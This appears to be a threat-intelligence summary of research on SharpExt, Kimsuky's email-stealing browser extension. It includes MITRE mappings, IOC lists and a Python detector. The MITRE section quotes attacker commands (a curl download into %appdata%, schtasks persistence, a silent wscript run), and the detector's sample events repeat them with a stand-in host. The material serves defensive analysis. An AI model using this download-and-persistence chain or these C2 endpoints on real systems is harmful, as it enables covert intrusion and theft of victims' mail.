Pivoting on a SharpExt to profile Kimsuky panels for great good

SharpExt is a browser-extension malware used by Kimsuky to steal emails and attachments, as detailed by Volexity and related researchers. The campaign maps to older activity, leverages a large network of domains for delivery and C2, and targets US, Europe, and South Korea, with multiple IOCs and script-based payloads observed. #SharpExt #Kimsuky #Volexity #Huntress #UltraViewer #NuclearPolicy101

Keypoints

  • SharpExt is a browser extension malware used by the Kimsuky threat actor to steal emails and attachments.
  • Researchers connected SharpExt activity to earlier campaigns (2021 reports) and to a site used by Kimsuky (nuclearpolicy101.org).
  • Delivery relies on PowerShell, batch files, DLLs, and VBScript components (run via wscript.exe) dropped alongside the browser extension.
  • Infrastructure uses a broad set of domain hosts and C2 servers to control the extension and deliver payloads (e.g., gonamod.com, souibi.com, nuclearpolicy101.org).
  • Persistence and execution involve scheduled tasks (schtasks) and registry/Word/Office-related abuse to enable ongoing execution.
  • Older campaigns reportedly used UltraViewer, and the operators continue to use Hangul Word Processor documents (HWP) in some engagements.
  • Recovered documents and a long list of IOCs indicate active, ongoing operations and a wide victimology footprint across several regions.

MITRE Techniques

  • [T1059.001] PowerShell – The actors use PowerShell components as part of delivery. Quote: ("the various powershell, batch files, DLLs and browser extensions that are delivered")
  • [T1059.003] Windows Command Shell – Batch and shell commands observed (e.g., curl commands and startup scripts). Quote: ("… delivered.")
  • [T1059.005] VBScript – VBScript files executed via wscript.exe. Quote: (`wscript.exe /b "%appdata%\microsoft\windows\colegg3.vbs"`)
  • [T1105] Ingress Tool Transfer – Files fetched from remote servers as part of the payload delivery. Quote: (`curl -o "%appdata%\microsoft\windows\1.xml" https://…`)
  • [T1053.005] Scheduled Task/Job – Persistence via scheduled tasks. Quote: (`schtasks /create /tn IdleSetting /xml %appdata%\microsoft\windows\1.xml /f`)
  • [T1071.001] Web Protocols – C2 activity and file delivery over web infrastructure. Quote: ("Some of the other domains are leveraged for C2 activity from the browser extension along with any necessary files needed by the browser extension.")
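The quoted commands form a small chain (curl drops a task XML under %appdata%\microsoft\windows, schtasks registers it, wscript.exe /b runs a .vbs from the same folder). The detector below is an added example written for this summary, not code from the Walmart Global Tech article; the process-creation events and the download URL are constructed.

```python
import re

# Constructed sample process-creation events: (process name, command line).
# The first three mirror the commands quoted above; the last two are benign lookalikes.
SAMPLE_EVENTS = [
    ("cmd.exe", 'curl -o "%appdata%\\microsoft\\windows\\1.xml" https://example.invalid/1.xml'),
    ("schtasks.exe", "schtasks /create /tn IdleSetting /xml %appdata%\\microsoft\\windows\\1.xml /f"),
    ("wscript.exe", 'wscript.exe /b "%appdata%\\microsoft\\windows\\colegg3.vbs"'),
    ("schtasks.exe", r"schtasks /create /tn Backup /xml C:\ProgramData\backup.xml /f"),
    ("wscript.exe", r"wscript.exe C:\Users\me\Desktop\hello.vbs"),
]

# A file path inside the staging folder used by the quoted commands.
APPDATA_WINDOWS = re.compile(r"%appdata%\\microsoft\\windows\\[^\s\"']+", re.IGNORECASE)


def classify_event(process, cmdline):
    """Return the MITRE technique tags a single event matches ([] if none)."""
    tags = []
    low = cmdline.lower()
    in_staging = APPDATA_WINDOWS.search(cmdline) is not None
    if "curl" in low and "-o" in low.split() and in_staging:
        tags.append("T1105")            # tool transfer into the staging folder
    if process.lower() == "schtasks.exe" and "/create" in low and "/xml" in low and in_staging:
        tags.append("T1053.005")        # task registered from a dropped XML
    if process.lower() == "wscript.exe" and "/b" in low.split() and ".vbs" in low and in_staging:
        tags.append("T1059.005")        # silent VBScript run from the staging folder
    return tags


def detect_chain(events):
    """Correlate events: flag a task XML that was first downloaded and then registered,
    plus any silent wscript run of a .vbs from the staging folder."""
    dropped = set()
    hits = []
    for process, cmdline in events:
        tags = classify_event(process, cmdline)
        m = APPDATA_WINDOWS.search(cmdline)
        path = m.group(0).lower() if m else None
        if "T1105" in tags and path:
            dropped.add(path)
        if "T1053.005" in tags and path in dropped:
            hits.append(("download-then-schtask", path))
        if "T1059.005" in tags:
            hits.append(("wscript-appdata-vbs", path))
    return hits


if __name__ == "__main__":
    for hit in detect_chain(SAMPLE_EVENTS):
        print(hit)
```

The staging-folder regex is the only environment-specific part; swap it for the paths seen in your own telemetry.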

Indicators of Compromise

  • [Domain] C2/domains used by campaigns – gonamod.com, souibi.com, nuclearpolicy101.org (compromised)
  • [Domain] Additional hosting domains linked to campaigns – dusieme.com, eislesf.live, siekis.com
  • [URL] C2 and delivery endpoints – gonamod.com/sanghyon/index.php, nuclearpolicy101.org/wp-admin/includes/0421/d.php?na=vbtmp
  • [Hash] Recovered document hashes – 42805ec97173c4a074580d473aeecbe4, b57e9474698823fcb300ad29b2ddd657
  • [Document] Recovered documents referenced in the campaign – The Burden of the Unintended.hwp, Interview memo_Gareth.doc
  • [File] Distributed/used files (examples) – cow.php, d.php, r.php, sc.php (and 2 more files)

Read more: https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9